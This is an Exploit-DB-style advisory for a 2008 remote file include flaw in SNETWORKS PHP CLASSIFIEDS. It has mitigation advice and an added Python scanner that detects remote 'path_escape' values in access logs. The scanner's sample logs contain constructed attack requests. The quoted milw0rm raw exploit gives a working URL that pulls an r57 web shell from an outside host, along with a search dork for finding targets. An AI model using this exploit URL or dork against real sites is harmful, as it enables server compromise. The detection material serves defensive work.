Vendor: PHP CLASSIFIEDS
By: Crackers_Child
CVSS: 8.8 HIGH
Remote File Include
CWE: 98
Product Name: PHP CLASSIFIEDS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SNETWORKS PHP CLASSIFIEDS Remote File Include Vulnerability

A remote file include vulnerability exists in SNETWORKS PHP CLASSIFIEDS. It allows an attacker to include a remote file containing arbitrary code and execute it on the vulnerable server. The cause is the application's failure to properly sanitize user-supplied input to the 'path_escape' parameter in the 'config.inc.php' script. An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI. Successful exploitation could result in arbitrary code execution in the context of the web server process.

Mitigation:

The vendor has released a patch to address this issue. Users are advised to upgrade to the latest version.
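
While the patch is being rolled out, web server access logs can be checked for requests that pass a remote location in 'path_escape'. The following is an added example, not part of the original advisory or the vendor's code; the log format (combined access log), the sample lines, the attacker.example host and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Schemes/wrappers that make a PHP include fetch non-local content.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect)://|^\s*data:', re.I)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%2568ttp -> %68ttp -> http)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_rfi_attempt(log_line):
    """True if the line requests config.inc.php with a remote path_escape."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/config.inc.php"):
        return False
    # parse_qsl decodes once and turns '+' into a space; decode further for
    # double-encoded values, and let REMOTE_RE tolerate leading whitespace.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "path_escape" and REMOTE_RE.match(fully_decode(value)):
            return True
    return False

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jan/2008:10:00:01 +0000] "GET /classifieds/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [05/Jan/2008:10:00:07 +0000] "GET /classifieds/config.inc.php?path_escape=http://attacker.example/shell.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [05/Jan/2008:10:00:09 +0000] "GET /classifieds/config.inc.php?path_escape=%2568ttp%253A%252F%252Fattacker.example%252Fs.txt HTTP/1.0" 200 312',
    '192.0.2.77 - - [05/Jan/2008:10:01:30 +0000] "GET /classifieds/config.inc.php?path_escape=../ HTTP/1.1" 200 0',
]

def flagged_lines(lines):
    """Indexes of log lines that look like remote-include attempts."""
    return [i for i, line in enumerate(lines) if is_rfi_attempt(line)]

if __name__ == "__main__":
    for i in flagged_lines(SAMPLE_LOG):
        print("possible RFI attempt:", SAMPLE_LOG[i])
```

Any direct request to config.inc.php is unusual for a file meant to be included by other scripts, so hits from this check are worth correlating with outbound connections from the web server at the same time.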

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       SNETWORKS PHP CLASSIFIEDS
*    [~] Page.........:       http://www.snetworks.biz/
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File Include Vulnerability
*    [~] Demo.........:       http://xxxclassifieds.com/classifieds/
*    [~] Dork.........:       Powered by SNETWORKS PHP CLASSIFIEDS
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*    
*
*       [~] Exploit Rfi...:     http://[Target]/[Path]/config.inc.php?path_escape= http://www.sibersavascilar.com/cr/r57.txt?
*
*
*
*                            
+_______________________________________________________________________________________________________________________+



        [~] Info......: Can Yakar . . .
                     



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoFrm.com,BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2008-01-05]